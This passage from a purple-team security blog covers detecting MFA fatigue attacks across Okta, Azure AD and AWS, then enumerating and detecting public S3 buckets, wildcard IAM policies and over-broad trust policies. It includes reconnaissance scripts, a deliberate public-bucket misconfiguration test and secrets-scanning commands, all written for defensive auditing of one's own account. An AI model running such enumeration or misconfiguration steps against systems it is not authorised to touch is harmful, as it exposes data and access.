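  "https://your-org.okta.com/api/v1/logs?filter=eventType+eq+\"user.authentication.auth_via_mfa\"&since=$(date -u -d '30 days ago' +%Y-%m-%dT%H:%M:%SZ)&limit=1000" | \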
  jq '
    group_by(.actor.id) |
    map({
      user: .[0].actor.displayName,
      total: length,
      failures: [.[] | select(.outcome.result == "FAILURE")] | length,
      successes: [.[] | select(.outcome.result == "SUCCESS")] | length
    }) |
    sort_by(.failures) |
    reverse |
    .[0:20]
  '

Users with high failure counts followed by eventual success are the fatigue attack pattern. Some will be legitimate (user locked themselves out, then called IT). The ones to investigate are those where the failure-to-success sequence happened in a short window (under 30 minutes) and from an unusual IP.
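The triage rule in the paragraph above (a failure-to-success sequence inside a short window, from an unusual IP) can be sketched in Python. This is a minimal sketch under stated assumptions: the flat event shape (`user`, `result`, `time`, `ip`) and the `known_ips` baseline are hypothetical simplifications for illustration, not the Okta System Log schema.

```python
from datetime import datetime, timedelta


def triage_fatigue_candidates(events, known_ips, min_failures=3, window_minutes=30):
    """Flag users whose MFA failures were followed by a success inside the
    window, where the success came from an IP outside the user's baseline.

    events:    list of dicts with keys user, result, time (datetime), ip
    known_ips: dict mapping user -> set of IPs previously seen for that user
    """
    window = timedelta(minutes=window_minutes)
    by_user = {}
    for event in events:
        by_user.setdefault(event["user"], []).append(event)

    flagged = []
    for user, user_events in by_user.items():
        ordered = sorted(user_events, key=lambda e: e["time"])
        for success in ordered:
            if success["result"] != "SUCCESS":
                continue
            # Failures that happened strictly before this success, inside the window
            failures = [
                e for e in ordered
                if e["result"] == "FAILURE"
                and timedelta(0) < success["time"] - e["time"] <= window
            ]
            unusual_ip = success["ip"] not in known_ips.get(user, set())
            if len(failures) >= min_failures and unusual_ip:
                flagged.append(
                    {"user": user, "failures": len(failures), "ip": success["ip"]}
                )
                break  # one hit per user is enough for triage
    return flagged
```

A user who fails three times and then succeeds from an address already in their baseline is not flagged, which keeps the "locked myself out, then called IT" cases out of the investigation queue.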

Blue Phase: Detection Across Identity Providers

Okta: Push Notification Flood

# Okta System Log: detect repeated push failures from same user
# Query for: 3 or more MFA failures for the same user inside one 10-minute bucket
curl -s -H "Authorization: SSWS ${OKTA_API_TOKEN}" \
  "https://your-org.okta.com/api/v1/logs?filter=eventType+eq+\"user.authentication.auth_via_mfa\"+and+outcome.result+eq+\"FAILURE\"&since=$(date -u -d '24 hours ago' +%Y-%m-%dT%H:%M:%SZ)" | \
  jq '
    # published[0:15] keeps "YYYY-MM-DDTHH:M" (up to the tens-of-minutes digit),
    # so each group covers a fixed 10-minute bucket rather than a single minute
    group_by([.actor.id, .published[0:15]]) |
    map(select(length >= 3)) |
    map({
      user: .[0].actor.displayName,
      window_start: (.[0].published[0:15] + "0"),
      failure_count: length,
      ips: [.[].client.ipAddress] | unique
    })
  '

Azure AD: Conditional Access Logs

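# Azure AD: MFA denial flood detection (Azure CLI calling Microsoft Graph)
# Sign-in events are not in the Azure activity log, which only covers resource
# management operations; they are exposed by the Graph signIns endpoint.
# Requires AuditLog.Read.All. Error code 500121 = strong authentication failed or was denied.
az rest --method get \
  --url "https://graph.microsoft.com/v1.0/auditLogs/signIns?\$filter=createdDateTime%20ge%20$(date -u -d '24 hours ago' +%Y-%m-%dT%H:%M:%SZ)%20and%20status/errorCode%20eq%20500121" \
  --query "value[].{user:userPrincipalName,time:createdDateTime,ip:ipAddress,error:status.errorCode}" \
  --output table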

In Microsoft Sentinel, the detection rule for MFA fatigue:

// Azure AD MFA Fatigue Detection (Sentinel KQL)
SigninLogs
| where TimeGenerated > ago(24h)
| where AuthenticationRequirement == "multiFactorAuthentication"
// Keep both successes and failures here: filtering to failures before the
// summarize would force SuccessCount to 0 and the rule would never fire
| summarize
    FailureCount = countif(ResultType != "0"),
    SuccessCount = countif(ResultType == "0"),
    IPs = make_set(IPAddress),
    StartTime = min(TimeGenerated),
    EndTime = max(TimeGenerated)
    by UserPrincipalName, bin(TimeGenerated, 30m)  // 30-minute window per user
| where FailureCount >= 3
| where SuccessCount >= 1
| project UserPrincipalName, FailureCount, SuccessCount, IPs, StartTime, EndTime
| order by FailureCount desc

AWS CloudTrail: Console Session After MFA Flood

If your organization uses AWS SSO (IAM Identity Center) with an external IdP, the CloudTrail event that matters is the console login event immediately following the MFA success:

# List AWS console logins from the last 24 hours with source IP and MFA flag
# (compare the IPs against your known egress ranges to spot the unusual ones)
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=ConsoleLogin \
  --start-time "$(date -d '24 hours ago' --iso-8601=seconds)" \
  --query 'Events[].{Time:EventTime,User:Username,Raw:CloudTrailEvent}' \
  --output json | \
  jq '.[] | (.Raw | fromjson) as $e | {
    time: .Time,
    user: .User,
    ip: $e.sourceIPAddress,
    mfa: $e.additionalEventData.MFAUsed
  }'

What a GuardDuty Alert Looks Like for This Attack

GuardDuty does not generate a specific finding for MFA fatigue (it does not have visibility into IdP logs). What it may catch downstream:

UnauthorizedAccess:IAMUser/ConsoleLoginSuccess.B: multiple successful console logins for the same user from different parts of the world
Discovery:IAMUser/AnomalousBehavior: if the attacker begins enumerating IAM after console access

The gap: GuardDuty’s behavioral analysis is per-account. If the attacker logs in using valid credentials and MFA, GuardDuty may not flag the initial access — only downstream actions that deviate from baseline.

Purple Phase: The Structural Fix

Fix 1: Replace Push MFA with FIDO2 Hardware Keys (for Tier-0 Accounts)

This is the only structural fix. MFA fatigue attacks work because push notifications can be approved by a human who is socially engineered. FIDO2 hardware keys (YubiKey, Google Titan, etc.) require physical possession of the key and a user gesture (touch). A WhatsApp message cannot substitute for physical key presence.

# Okta: Require hardware key MFA for admin accounts
# (done via Okta Admin Console → Security → Authentication Policies)
# CLI example using Okta API:

# Create the authentication policy container. On its own this enforces nothing:
# the hardware-authenticator requirement lives in a policy rule added afterwards.
curl -X POST \
  "https://your-org.okta.com/api/v1/policies" \
  -H "Authorization: SSWS ${OKTA_API_TOKEN}" \
  -H "Content-Type: application/json" \
  -d '{
    "name": "Admin Hardware Key Policy",
    "type": "ACCESS_POLICY",
    "status": "ACTIVE",
    "description": "Requires FIDO2 hardware key for admin access"
  }'

Phasing hardware keys across an organization:

Tier	Examples	Timeline
Tier 0 — immediate	Cloud admin, IAM admin, Okta admin, DNS admin	Week 1
Tier 1 — 30 days	All engineers with production access	Month 1
Tier 2 — 90 days	All employees with SSO access	Month 3
Contractors	Scope-limited access, enforce at boundary	Immediate

Fix 2: Number Matching (Intermediate Mitigation)

If hardware keys cannot be deployed immediately, number matching significantly reduces MFA fatigue effectiveness. Instead of a simple “approve/deny” push, the user must match a number shown on the login screen to a number shown in the authenticator app. This breaks the fatigue pattern — the attacker cannot trigger an approval without the user actively entering the correct number.

# Duo: Enable Verified Duo Push (Duo's number-matching feature)
# Duo Admin Panel → Policies → Authentication methods → Verified Duo Push

# Microsoft Authenticator: Enable number matching
# Azure AD → Security → Authentication methods → Microsoft Authenticator
# Enable: "Require number matching for push notifications"

# Okta Verify: Enable number challenge
# Okta Admin → Security → Multifactor → Okta Verify → Enable "Number Challenge"
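To make the mechanism concrete, here is a toy model of number matching in Python. It is a sketch only: real identity providers implement this server-side, and the function names `new_challenge` and `verify_push` are hypothetical. It shows why a blind tap no longer works (no number is submitted) and also why a relayed number still passes, which is what keeps this a mitigation and not a structural fix.

```python
import hmac
import secrets


def new_challenge():
    """Return the two-digit number displayed on the login screen."""
    return f"{secrets.randbelow(100):02d}"


def verify_push(displayed_number, number_entered_in_app):
    """Approve only when the user typed the number shown on the login screen.

    The comparison itself cannot tell whether the user read the number from
    their own screen or had it read to them over the phone by an attacker.
    """
    return hmac.compare_digest(displayed_number, number_entered_in_app)


challenge = new_challenge()
print(verify_push(challenge, ""))         # blind "approve" with no number: rejected
print(verify_push(challenge, challenge))  # user (or a relay) supplies the number: approved
```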

Fix 3: Detect and Block — Automated Response to Fatigue Pattern

#!/usr/bin/env python3
# Purple Team EP05: MFA Fatigue Auto-Response
# Monitors the Okta System Log and alerts the security team via SNS when the
# fatigue pattern appears (suspending the user would be a separate Okta API call)
# Run as a Lambda function or scheduled script in your SIEM pipeline

import boto3
import requests
from datetime import datetime, timedelta, timezone

OKTA_DOMAIN = "your-org.okta.com"
OKTA_TOKEN = "your-okta-api-token"  # use Secrets Manager in production
SNS_TOPIC_ARN = "arn:aws:sns:us-east-1:123456789012:security-alerts"

def get_recent_mfa_events(hours=1):
    since = (datetime.now(timezone.utc) - timedelta(hours=hours)).strftime("%Y-%m-%dT%H:%M:%SZ")
    url = f"https://{OKTA_DOMAIN}/api/v1/logs"
    params = {
        "filter": 'eventType eq "user.authentication.auth_via_mfa"',
        "since": since,
        "limit": 1000
    }
    headers = {"Authorization": f"SSWS {OKTA_TOKEN}"}
    response = requests.get(url, params=params, headers=headers, timeout=30)
    response.raise_for_status()  # fail loudly on auth or rate-limit errors
    return response.json()

def detect_fatigue_pattern(events, failure_threshold=3, window_minutes=10):
    def parse_time(ts):
        # Okta timestamps end in "Z"; older Pythons need an explicit offset
        return datetime.fromisoformat(ts.replace("Z", "+00:00"))

    user_events = {}
    for event in events:
        user_id = event["actor"]["id"]
        user_name = event["actor"]["displayName"]
        result = event["outcome"]["result"]
        timestamp = parse_time(event["published"])

        if user_id not in user_events:
            user_events[user_id] = {"name": user_name, "events": []}
        user_events[user_id]["events"].append({"result": result, "time": timestamp})

    window = timedelta(minutes=window_minutes)
    fatigue_users = []
    for user_id, data in user_events.items():
        events_sorted = sorted(data["events"], key=lambda x: x["time"])
        for success in (e for e in events_sorted if e["result"] == "SUCCESS"):
            # Count only the failures inside the window that ends at this success
            failures = [
                e for e in events_sorted
                if e["result"] == "FAILURE"
                and success["time"] - window <= e["time"] < success["time"]
            ]
            if len(failures) >= failure_threshold:
                fatigue_users.append({
                    "user_id": user_id,
                    "user_name": data["name"],
                    "failure_count": len(failures),
                    "success_after_failures": True
                })
                break  # one alert per user per run

    return fatigue_users

def alert_security_team(fatigue_users):
    sns = boto3.client("sns")
    message = f"MFA FATIGUE ALERT — {len(fatigue_users)} user(s) detected:\n"
    for user in fatigue_users:
        message += f"  - {user['user_name']}: {user['failure_count']} failures then success\n"

    sns.publish(
        TopicArn=SNS_TOPIC_ARN,
        Subject="Purple Team: MFA Fatigue Attack Detected",
        Message=message
    )

def lambda_handler(event, context):
    events = get_recent_mfa_events(hours=1)
    fatigue_users = detect_fatigue_pattern(events)
    if fatigue_users:
        alert_security_team(fatigue_users)
    return {"fatigue_users_detected": len(fatigue_users)}

Fix 4: Remove Hardcoded Credentials from File Shares and Scripts

The Uber breach succeeded because the attacker found hardcoded credentials on a file share accessible to contractors. Once the identity layer is fixed, the downstream fix is to find and remove those credentials:

# Ensure no scripts or configuration files contain credentials
# Run TruffleHog against your internal repositories and file shares
trufflehog filesystem /path/to/internal/share \
  --json \
  --include-detectors=all \
  2>/dev/null | \
  jq '{file: .SourceMetadata.Data.Filesystem.file, detector: .DetectorName, verified: .Verified}'

Run This in Your Own Environment: MFA Audit

#!/bin/bash
# Purple Team EP05 — MFA Coverage Audit
# Lists AWS console users without MFA and IAM users whose active access keys are older than 90 days

echo "=== AWS: Console Users Without MFA ==="
aws iam generate-credential-report > /dev/null 2>&1
sleep 5
aws iam get-credential-report --query 'Content' --output text | base64 -d | \
  awk -F',' 'NR>1 && $4=="true" && $8=="false" {
    print "  USER: " $1 " | Console: " $4 " | MFA: " $8
  }'

echo ""
echo "=== AWS: IAM Users with Long-Lived Access Keys (rotation risk) ==="
aws iam get-credential-report --query 'Content' --output text | base64 -d | \
  awk -F',' 'NR>1 && $9=="true" && $10!="N/A" {
    cmd = "date -d " $10 " +%s"
    cmd | getline key_date; close(cmd)
    now = systime()
    age_days = int((now - key_date) / 86400)
    if (age_days > 90) print "  USER: " $1 " | KEY AGE: " age_days " days"
  }'

echo ""
echo "=== RECOMMENDATION ==="
echo "  - Any console user without MFA = immediate A07 exposure"
echo "  - For accounts with Okta/Azure AD: run IdP-specific audit above"
echo "  - Hardware FIDO2 keys required for all admin accounts"
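The same audit can be sketched in Python by reading the credential report by column name instead of by position, which avoids off-by-one mistakes with `awk` field numbers. This is a hedged sketch: the function name `audit_credential_report` is hypothetical, the column names are the ones the IAM credential report uses, and the input is assumed to be the already-decoded CSV text.

```python
import csv
import io
from datetime import datetime, timezone


def audit_credential_report(report_csv, now=None, max_key_age_days=90):
    """Return (console users without MFA, active access keys older than the limit)."""
    now = now or datetime.now(timezone.utc)
    no_mfa, old_keys = [], []
    for row in csv.DictReader(io.StringIO(report_csv)):
        if row["password_enabled"] == "true" and row["mfa_active"] == "false":
            no_mfa.append(row["user"])
        for n in ("1", "2"):  # each IAM user can hold up to two access keys
            rotated = row[f"access_key_{n}_last_rotated"]
            if row[f"access_key_{n}_active"] == "true" and rotated != "N/A":
                rotated_at = datetime.fromisoformat(rotated.replace("Z", "+00:00"))
                age_days = (now - rotated_at).days
                if age_days > max_key_age_days:
                    old_keys.append((row["user"], int(n), age_days))
    return no_mfa, old_keys
```

The CSV text can come from `aws iam get-credential-report --query 'Content' --output text | base64 -d`, piped in or saved to a file first.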

⚠ Common Mistakes When Responding to MFA Fatigue Risk

Mandating security training as the primary response. The Uber contractor was experienced. Training did not fail — the attacker exploited a social engineering vector that training cannot structurally prevent. Hardware keys remove the social engineering surface entirely.

Implementing “number matching” and considering MFA fatigue solved. Number matching makes fatigue attacks harder, not impossible. A sophisticated attacker can relay the number in real time via voice call (“what number do you see on your screen?”). It buys time; it does not eliminate the attack class.

Requiring MFA for employees but not contractors. The Uber breach was a contractor account. Contractor access policies tend to have looser MFA requirements because contractors often resist corporate MDM on personal devices. The solution is to scope contractor access tightly and require hardware key MFA at the access boundary, not push MFA.

Not monitoring for the failure-then-success pattern. The Okta System Log, Azure AD Sign-in Logs, and Duo Admin Panel all have the data to detect MFA fatigue in real time. Most organizations generate these logs but do not have detection rules for the pattern. The detection is straightforward; the investment is adding the rule to your SIEM.

Forgetting session tokens. The Okta breach was not MFA fatigue — it was session token theft. An attacker who can steal a valid session token does not need to beat MFA at all. Session token lifetime, storage security, and re-authentication requirements for sensitive operations are separate controls that address this variant.
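The two session controls named above, bounded session lifetime and re-authentication for sensitive operations, can be sketched as a single authorization check. This is a minimal sketch: the session dictionary shape, the constant names, and the specific lifetimes are all hypothetical values chosen for illustration.

```python
import time

SESSION_MAX_AGE = 8 * 3600  # hypothetical: total session lifetime in seconds
STEP_UP_MAX_AGE = 5 * 60    # hypothetical: how recent MFA must be for sensitive operations


def authorize(session, sensitive, now=None):
    """Return 'allowed', 'reauth_required', or 'expired' for a request.

    session: dict with created_at and last_mfa_at as epoch seconds
    """
    now = time.time() if now is None else now
    if now - session["created_at"] > SESSION_MAX_AGE:
        return "expired"
    if sensitive and now - session["last_mfa_at"] > STEP_UP_MAX_AGE:
        return "reauth_required"
    return "allowed"
```

With a check like this, a stolen session token is still usable for routine requests until it expires, but it cannot be used for a sensitive operation without a fresh MFA event.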

Quick Reference

Attack Variant	Mechanism	Structural Fix
Push notification flood	Attacker initiates logins repeatedly until user accepts	FIDO2 hardware key MFA
Social engineering layer	Attacker contacts user claiming to be IT support	Hardware key (physical presence required)
Session token theft	Steal valid session without needing MFA at all	Short session lifetime + re-auth for sensitive ops
Number matching bypass	Relay number via voice call in real time	Hardware key (no relay possible)
SIM swap	Port victim’s phone number to attacker’s SIM; receive OTP	Hardware key (phone-independent)

Key Takeaways

An MFA fatigue attack exploits push notification UX — training users to tap “deny” competes with a trained habit of tapping “accept”; hardware keys eliminate the attack surface by requiring physical presence
The Uber breach (2022) was MFA fatigue + hardcoded credentials in a file share — two OWASP categories chained (A07 + A02)
Detection is straightforward: multiple MFA failures followed by a success in a short window — this pattern exists in every IdP’s logs; adding the detection rule is the work
Number matching is a meaningful intermediate mitigation; it is not a structural fix
Hardware FIDO2 keys are the structural fix — they require physical presence and are phishing-resistant by design
Tier-0 accounts (cloud admin, IAM admin, Okta admin) cannot wait for the phased rollout — hardware keys on day one
Session token theft (CircleCI, Okta support breach) is a related A07 variant: even perfect MFA is bypassed if a valid session token is exfiltrated

What’s Next

EP06 covers CI/CD secrets exposure — how pipeline breaches work, why storing credentials in environment variables is structurally dangerous, and how the CircleCI breach exposed secrets that teams thought were safely stored. The structural answer is OIDC workload identity (IAM EP07): short-lived credentials that cannot be exfiltrated because they don’t exist until the moment they’re needed.


Broken Access Control in AWS: From Misconfigured S3 to Admin

June 4, 2026 by Vamshi Krishna Santhapuri

Reading Time: 9 minutes


TL;DR

Broken access control in AWS is OWASP A01 — the most common cloud security failure, covering IAM wildcards, public S3 buckets, and overly broad trust policies
A public S3 bucket containing 47 million customer records stayed public for six months before an authorized assessment found it: no AWS Config alert because the S3 public-access rule was not in the rule set, and no GuardDuty finding because the bucket went public before GuardDuty was enabled
The red phase: three commands to identify public buckets, enumerate IAM over-permissions, and test trust policy abuse — all with read-only access on your own account
The blue phase: two AWS Config managed rules and one GuardDuty finding type that cover the majority of A01 findings
The purple phase: deny-based SCPs, bucket public access blocks, and IAM Access Analyzer — structural controls, not monitoring alerts
Cross-series: IAM privilege escalation paths (IAM EP08) and AWS least privilege audit (IAM EP09) go deeper on the IAM layer

OWASP Mapping: A01 Broken Access Control — primarily. A09 Logging and Monitoring Failures — the six-month detection gap demonstrates A09 as an amplifier of A01.

The Big Picture

┌─────────────────────────────────────────────────────────────────────┐
│              BROKEN ACCESS CONTROL — ATTACK SURFACE                 │
│                                                                     │
│   INTERNET                    AWS ACCOUNT                           │
│                                                                     │
│   Attacker ──────────────▶  S3 bucket (public read)                 │
│                             └── 47M customer records                │
│                                                                     │
│   Attacker ──────────────▶  IAM user with "Action": "*"             │
│   (compromised creds)        └── escalate → admin access            │
│                                                                     │
│   Attacker ──────────────▶  Trust policy: "AWS": "*"                │
│   (any AWS account)          └── assume role from attacker's        │
│                                  account                            │
│                                                                     │
│   ═══════════════════════════════════════════════════════           │
│                                                                     │
│   DETECTION GAPS (A09 amplifying A01):                              │
│   • S3 public access not in AWS Config rules                        │
│   • GuardDuty enabled after exposure                                │
│   • No IAM Access Analyzer                                          │
│   • No SCP boundary on public bucket creation                       │
│                                                                     │
└─────────────────────────────────────────────────────────────────────┘

Broken access control in AWS is the infrastructure equivalent of OWASP A01: a principal can reach a resource it should not be able to reach, because the access control decision was either not made or made incorrectly. In the cloud context, this manifests as public S3 buckets, IAM policies with wildcard actions and resources, and trust policies that allow any principal rather than a specific, scoped entity.

The Assessment That Changed My Approach to Access Control Auditing

During an authorized assessment, I found an S3 bucket containing 47 million customer records. The bucket name was generic — no obvious PII signal in the name itself. It was created two years prior by an engineer who was troubleshooting a data pipeline and needed temporary public access to share data with an external partner. The partner relationship ended. The bucket access was never reverted.

The bucket had been public for six months at the time I found it. I checked the AWS Config rules: S3 public access was not in the rule set. GuardDuty was enabled but no finding had fired — GuardDuty generates a Policy:S3/BucketAnonymousAccessGranted finding when public access is enabled, but only if the finding is new during GuardDuty’s monitoring window. The bucket went public before GuardDuty was enabled.

No alert ever fired. Not because the tools couldn’t detect it — because the tools weren’t configured to look.

This is A01 amplified by A09. The broken access control is the public bucket. The six-month window is the logging and monitoring failure.

Red Phase: How Broken Access Control Works in Practice

The red team perspective on broken access control starts with enumeration. What can this principal reach that it shouldn’t be able to reach?

Enumerating Public S3 Buckets

# The account-level block is the same for every bucket, so check it once
account_id=$(aws sts get-caller-identity --query Account --output text)
account_block=$(aws s3control get-public-access-block \
  --account-id "$account_id" \
  2>/dev/null | jq -r '.PublicAccessBlockConfiguration.BlockPublicAcls')
echo "Account-level BlockPublicAcls: ${account_block:-not configured}"

aws s3api list-buckets --query 'Buckets[].Name' --output text | \
  tr '\t' '\n' | \
  while read -r bucket; do
    # Check bucket-level policy
    policy=$(aws s3api get-bucket-policy-status --bucket "$bucket" 2>/dev/null | \
      jq -r '.PolicyStatus.IsPublic')

    # Check bucket ACL
    acl=$(aws s3api get-bucket-acl --bucket "$bucket" 2>/dev/null | \
      jq -r '.Grants[] | select(.Grantee.URI == "http://acs.amazonaws.com/groups/global/AllUsers") | .Permission')

    if [ "$policy" = "true" ] || [ -n "$acl" ]; then
      echo "PUBLIC BUCKET: $bucket (policy_public=$policy, acl_grants=$acl)"
    fi
  done

Enumerating Overly Permissive IAM Policies

# Find all customer-managed policies with wildcard actions
aws iam list-policies --scope Local --query 'Policies[].Arn' --output text | \
  tr '\t' '\n' | \
  while read arn; do
    version=$(aws iam get-policy --policy-arn "$arn" \
      --query 'Policy.DefaultVersionId' --output text)
    doc=$(aws iam get-policy-version --policy-arn "$arn" --version-id "$version" \
      --query 'PolicyVersion.Document' --output json)

    # Action may be a string or a list, and Statement a single object or a list
    wildcard='[.Statement] | flatten | .[] | select(.Effect == "Allow" and ([.Action] | flatten | any(. == "*")))'
    if echo "$doc" | jq -e "$wildcard" > /dev/null 2>&1; then
      echo "WILDCARD ACTION POLICY: $arn"
      echo "$doc" | jq "$wildcard"
    fi
  done
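For policy documents already exported to JSON, the same wildcard check can be sketched in Python. The helper names `as_list` and `wildcard_allow_statements` are hypothetical; the sketch only assumes the standard IAM policy shape, where `Statement` and `Action` may each be a single value or a list.

```python
def as_list(value):
    """IAM policy fields may hold one value or a list; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def wildcard_allow_statements(policy_document):
    """Return the Allow statements whose Action includes the full wildcard '*'."""
    return [
        statement
        for statement in as_list(policy_document.get("Statement"))
        if statement.get("Effect") == "Allow"
        and "*" in as_list(statement.get("Action"))
    ]
```

Service-level wildcards such as `s3:*` are deliberately not flagged here; whether those count as over-permission depends on the role, so they are better reviewed separately.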

Testing Trust Policy Abuse

# Find IAM roles with overly broad trust policies
# Specifically: wildcard principals, and other AWS accounts trusted with no Condition
current_account=$(aws sts get-caller-identity --query Account --output text)

aws iam list-roles --query 'Roles[].{Name:RoleName,Arn:Arn}' --output json | \
  jq -r '.[].Arn' | \
  while read -r role_arn; do
    trust=$(aws iam get-role --role-name "$(basename "$role_arn")" \
      --query 'Role.AssumeRolePolicyDocument' --output json 2>/dev/null)

    # Check for wildcard principals ("Principal": "*" or "Principal": {"AWS": "*"})
    if echo "$trust" | jq -e '[.Statement[] | select(.Effect == "Allow") | select(.Principal == "*" or ([.Principal.AWS?] | flatten | any(. == "*")))] | length > 0' > /dev/null 2>&1; then
      echo "WILDCARD TRUST PRINCIPAL: $role_arn"
    fi

    # Check for cross-account trust without conditions (no ExternalId, no org restriction)
    echo "$trust" | \
      jq -r '.Statement[] | select(.Effect == "Allow" and .Condition == null) | [.Principal.AWS?] | flatten | .[] | strings' 2>/dev/null | \
      grep -oE '[0-9]{12}' | sort -u | \
      while read -r account_in_trust; do
        if [ "$account_in_trust" != "$current_account" ]; then
          echo "CROSS-ACCOUNT TRUST (verify scope): $role_arn trusts account $account_in_trust"
        fi
      done
  done
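The two trust-policy checks can also be expressed as a small Python classifier for offline review of exported role documents. This is a sketch under assumptions: `classify_trust_policy` and its finding labels are hypothetical names, and "no Condition block" is used as a rough proxy for "unscoped", which will need manual confirmation.

```python
import re


def classify_trust_policy(trust_document, own_account_id):
    """Return (label, principal) findings for risky Allow statements."""
    statements = trust_document.get("Statement", [])
    if isinstance(statements, dict):
        statements = [statements]

    findings = []
    for statement in statements:
        if statement.get("Effect") != "Allow":
            continue
        principal = statement.get("Principal")
        if principal == "*":
            aws_principals = ["*"]
        elif isinstance(principal, dict):
            aws = principal.get("AWS", [])
            aws_principals = aws if isinstance(aws, list) else [aws]
        else:
            aws_principals = []

        for p in aws_principals:
            if p == "*":
                findings.append(("wildcard", p))
                continue
            # Account IDs are 12 digits, whether given bare or inside an ARN
            match = re.search(r"\d{12}", p)
            if match and match.group() != own_account_id and "Condition" not in statement:
                findings.append(("cross_account_no_condition", match.group()))
    return findings
```

Service principals such as `ec2.amazonaws.com` are ignored, since they sit under the `Service` key and are not cross-account trust.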

Simulating S3 Exfiltration (on your own bucket — safe test)

# Create a test bucket, make it public, verify it's accessible without credentials
# Do this in a non-production account only

TEST_BUCKET="purple-team-test-$(date +%s)"
aws s3 mb s3://${TEST_BUCKET} --region us-east-1

# Disable the public access block (simulates the misconfiguration)
aws s3api put-public-access-block \
  --bucket "${TEST_BUCKET}" \
  --public-access-block-configuration \
  "BlockPublicAcls=false,IgnorePublicAcls=false,BlockPublicPolicy=false,RestrictPublicBuckets=false"

# Add a public-read bucket policy
aws s3api put-bucket-policy --bucket "${TEST_BUCKET}" --policy '{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": "*",
    "Action": "s3:GetObject",
    "Resource": "arn:aws:s3:::'"${TEST_BUCKET}"'/*"
  }]
}'

# Put a test file
echo "PURPLE_TEAM_TEST_DATA" | aws s3 cp - s3://${TEST_BUCKET}/test.txt

# Verify it's accessible without credentials
curl -s "https://${TEST_BUCKET}.s3.amazonaws.com/test.txt"
# Should return: PURPLE_TEAM_TEST_DATA

echo ""
echo "Test complete. Clean up:"
echo "aws s3 rb s3://${TEST_BUCKET} --force"

Blue Phase: What Detection Looks Like

What AWS Config Catches

Two managed rules cover the majority of S3 broken access control findings:

# Enable the S3 public access rules in AWS Config
# (requires Config to already be enabled)

# Rule 1: s3-bucket-public-read-prohibited
aws configservice put-config-rule --config-rule '{
  "ConfigRuleName": "s3-bucket-public-read-prohibited",
  "Source": {
    "Owner": "AWS",
    "SourceIdentifier": "S3_BUCKET_PUBLIC_READ_PROHIBITED"
  },
  "Scope": {
    "ComplianceResourceTypes": ["AWS::S3::Bucket"]
  }
}'

# Rule 2: s3-account-level-public-access-blocks-periodic
aws configservice put-config-rule --config-rule '{
  "ConfigRuleName": "s3-account-level-public-access-blocks-periodic",
  "Source": {
    "Owner": "AWS",
    "SourceIdentifier": "S3_ACCOUNT_LEVEL_PUBLIC_ACCESS_BLOCKS_PERIODIC"
  }
}'

# Check current compliance status
aws configservice describe-compliance-by-config-rule \
  --config-rule-names s3-bucket-public-read-prohibited \
  --query 'ComplianceByConfigRules[].{Rule:ConfigRuleName,Compliance:Compliance.ComplianceType}'

What GuardDuty Catches

GuardDuty generates these findings for S3 broken access control:

Finding Type	Trigger	Severity
`Policy:S3/BucketAnonymousAccessGranted`	Bucket policy or ACL change grants access to anyone on the internet	High
`Policy:S3/BucketPublicAccessGranted`	Bucket policy or ACL change grants access to all authenticated AWS users	High
`Discovery:S3/MaliciousIPCaller`	S3 discovery API (for example ListObjects) called from a known malicious IP	High

# Query GuardDuty findings for S3 public access violations
DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)

aws guardduty list-findings \
  --detector-id "${DETECTOR_ID}" \
  --finding-criteria '{
    "Criterion": {
      "type": {
        "Equals": ["Policy:S3/BucketAnonymousAccessGranted", "Policy:S3/BucketPublicAccessGranted"]
      }
    }
  }' \
  --query 'FindingIds' --output text | \
  xargs -n 10 aws guardduty get-findings \
    --detector-id "${DETECTOR_ID}" \
    --finding-ids | \
  jq '.Findings[] | {type: .Type, bucket: .Resource.S3BucketDetails[0].Name, severity: .Severity}'

What IAM Access Analyzer Catches

IAM Access Analyzer continuously analyzes resource policies for external access — S3 buckets, IAM roles, KMS keys, SQS queues, Lambda functions. It generates a finding any time a resource policy grants access to a principal outside the AWS account (or AWS Organization boundary).

# Enable IAM Access Analyzer for the account
aws accessanalyzer create-analyzer \
  --analyzer-name "account-access-analyzer" \
  --type ACCOUNT

# List all active findings (external access granted)
aws accessanalyzer list-findings \
  --analyzer-arn $(aws accessanalyzer list-analyzers --query 'analyzers[0].arn' --output text) \
  --filter '{"status": {"eq": ["ACTIVE"]}}' \
  --query 'findings[].{Resource:resource,Principal:principal,Action:action}' \
  --output table

What the CloudTrail Event Looks Like

When an anonymous user accesses a public S3 object:

{
  "eventVersion": "1.09",
  "userIdentity": {
    "type": "AWSAccount",
    "accountId": "ANONYMOUS_PRINCIPAL",  
    "principalId": "ANONYMOUS_PRINCIPAL"
  },
  "eventTime": "2024-03-15T02:47:00Z",
  "eventSource": "s3.amazonaws.com",
  "eventName": "GetObject",
  "requestParameters": {
    "bucketName": "your-bucket-name",
    "key": "customer-data/records.csv"
  },
  "sourceIPAddress": "198.51.100.1",
  "userAgent": "python-requests/2.28.0"
}

The signal: userIdentity.type = "AWSAccount" with accountId = "ANONYMOUS_PRINCIPAL" on a GetObject event. This is a read from an anonymous, unauthenticated principal.

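-- Athena query over CloudTrail logs to find anonymous S3 GetObject events
-- Assumes CloudTrail S3 data events are enabled for the bucket, and that
-- cloudtrail_logs uses the standard AWS-documented table schema, where
-- requestParameters is a JSON string and eventTime is an ISO 8601 string

SELECT
  eventTime,
  sourceIPAddress,
  json_extract_scalar(requestParameters, '$.bucketName') AS bucket_name,
  json_extract_scalar(requestParameters, '$.key') AS object_key,
  userIdentity.type,
  userIdentity.accountId
FROM cloudtrail_logs
WHERE
  eventName = 'GetObject'
  AND userIdentity.type = 'AWSAccount'
  AND userIdentity.accountId = 'ANONYMOUS_PRINCIPAL'
  AND from_iso8601_timestamp(eventTime) > current_timestamp - interval '7' day
ORDER BY eventTime DESC
LIMIT 100;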
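The query above only returns rows if S3 data events are actually being logged. As a minimal sketch, assuming a trail that uses basic (not advanced) event selectors, the helper below builds the selector JSON for a list of buckets. The function name, trail name, and bucket names are hypothetical placeholders, not part of the AWS CLI.

```shell
# build_s3_data_event_selectors is a hypothetical helper: it prints the JSON
# expected by --event-selectors, covering every object in the named buckets.
build_s3_data_event_selectors() {
  sel_values=""
  for sel_bucket in "$@"; do
    # A trailing slash after the bucket name means "all objects in this bucket"
    sel_values="${sel_values:+${sel_values},}\"arn:aws:s3:::${sel_bucket}/\""
  done
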